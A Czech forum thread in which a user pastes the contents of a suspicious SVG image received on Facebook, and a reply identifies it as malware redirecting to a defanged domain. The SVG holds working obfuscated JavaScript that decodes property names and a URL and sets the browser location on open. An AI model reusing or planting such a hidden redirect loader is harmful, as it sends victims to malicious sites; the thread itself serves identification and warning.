
Vir nebo co to je?
Neporadíte mi co to je? Dostala jsem to na facebooku jako obrázek svg a když jsem to chtěla otevřít tak se mi můj antivir mohl doslova zbláznit. Otevřela jsem to v poznamkovym bloku a obsah sem dávám.
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" xmlns="http://www.w3.org/2000/svg">
<circle cx="250" cy="250" r="50" fill="red" />
<script type="text/javascript"><![CDATA[
function obuuypw(nyuzk,cmhrbw,nozhko){
var adbpe = "2ZJCVvUES3?ohBKL8r9ksaFHP:Md1tTbp64ng.iGl_7IOAjfyR/5DXxmN0Y=czue";
var jdmgkz = ["utApd=j8lV?0i1Pz.B7e4hJnyG6KxfCov39HFr2kT5YMU:bZLmDEaINRcgSs_\/OX","6t2YyHJ1skpTLAvGuNK=V7Em_jzPfc45IR30hBlMx:?UDZ8F.Xi\/dgaCrSo9nbeO","UL8ul7o=Hp_SyFRTKZI.van5fGO:Jehz2YkV4g1t6rXA0bCsjB9M?xmN3iDP\/cEd","0gjLpfEJ13TeasyYGzOKMZ6?l9AS.\/X:vuNP=Rid_nVF5Dm4cUIBrCh7kH2bxo8t","TdfCOK?uX\/FU3V_xJ689=rNDyZIBm17snepgYARaS0tMl5.E4bvhHozkGcPi2:jL","JSUC3Mvkl?TPp1ds\/:Af7cZzIh4F052Dej9KBbVu.xN=LOYa_6oXgyGHERi8ntrm","h9CFZ\/.a=_HfzkKpV:iEreY5B0yIXD2tm4UoGgTc1RbNS68jlnPLdMJu3?xA7sOv","BPa7pk401iN8\/5K2EUXmztv=9gC:6oRLT.MFfSIbhD?cGJsrOeHnjlVZ3y_YuxAd"];
var eyoya = "";
var gscdm = 0;
while(jdmgkz[gscdm]){
gscdm++;
}
var bqaar = 0;
while(nyuzk[bqaar]){
var mlwvs = 0;
var ikffcr = -1;
while(adbpe[mlwvs]){
if(adbpe[mlwvs] == nyuzk[bqaar]){
ikffcr = mlwvs;
break;
}
mlwvs++;
}
if(ikffcr >= 0){
var nvpafx = 0;
var neiok = -1;
while(jdmgkz[bqaar%gscdm][nvpafx]){
if(jdmgkz[bqaar%gscdm][nvpafx] == nyuzk[bqaar]){
neiok = nvpafx;
break;
}
nvpafx++;
}
eyoya += adbpe[neiok];
}else{
eyoya += nyuzk[bqaar];
}
bqaar++;
}
var uyicc = "";
for(lseoqn=cmhrbw;lseoqn<eyoya.length;lseoqn++){
uyicc += eyoya[lseoqn];
}
eyoya = uyicc;
return eyoya;
}
var bxwtag = window;
var vgyhy = obuuypw("Hw/xRmEIfT2",8,true);
var iqgazk = obuuypw("qa6xYGOLia/eS.fuhc1eg",13,true);
var eqdss = obuuypw("_nVvne7/BOs",7,false);
bxwtag[vgyhy][iqgazk][eqdss] = obuuypw("Xc7esqm/fc29vou8ON1SAnfZDIyvv5:A4cgv3e",7,false);
]]></script>
</svg>
Nějaký malware to bude. Jinak by to nebylo takhle šíleně obfuskovaný.
Snaží se to o přesměrování na hxxp://mourid.com/php/trust.php
VirusTotal